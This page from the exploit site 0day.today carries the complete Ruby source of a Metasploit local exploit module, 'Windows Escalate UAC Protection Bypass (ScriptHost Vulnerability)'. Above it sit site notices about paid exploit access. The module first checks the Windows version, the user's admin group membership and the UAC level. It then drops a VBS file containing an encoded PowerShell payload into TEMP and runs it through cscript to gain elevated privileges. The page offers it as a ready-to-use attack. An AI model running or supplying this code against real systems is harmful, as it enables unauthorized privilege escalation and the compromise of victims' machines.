0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) Exploit
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper include Exploit::Powershell include Post::File include Post::Windows::Priv include Post::Windows::Runas def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)', 'Description' => %q{ This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries. }, 'License' => MSF_LICENSE, 'Author' => [ 'Vozzie', 'Ben Campbell' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html', 'URL', 'https://github.com/Vozzie/uacscript' ] ], 'DisclosureDate'=> 'Aug 22 2015' )) end def exploit # Validate that we can actually do things before we bother # doing any more work validate_environment! check_permissions! # get all required environment variables in one shot instead. This # is a better approach because we don't constantly make calls through # the session to get the variables. env_vars = get_envs('TEMP', 'WINDIR') case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs" upload_vbs(vbs_filepath) cmd_exec("cscript.exe //B #{vbs_filepath}") end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def upload_vbs(payload_filepath) vbs = File.read(File.join(Msf::Config.data_directory, 'exploits', 'scripthost_uac_bypass', 'bypass.vbs')) command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true) vbs.gsub!('COMMAND', command) print_status('Uploading the Payload VBS to the filesystem...') begin vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..") write_file(payload_filepath, vbs) register_file_for_cleanup(payload_filepath) rescue Rex::Post::Meterpreter::RequestError => e fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}") end end def validate_environment! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? winver = sysinfo['OS'] case winver when /Windows (7|2008)/ print_good("#{winver} may be vulnerable.") else fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status('UAC is Enabled, checking level...') else unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end # 0day.today [2024-12-26] #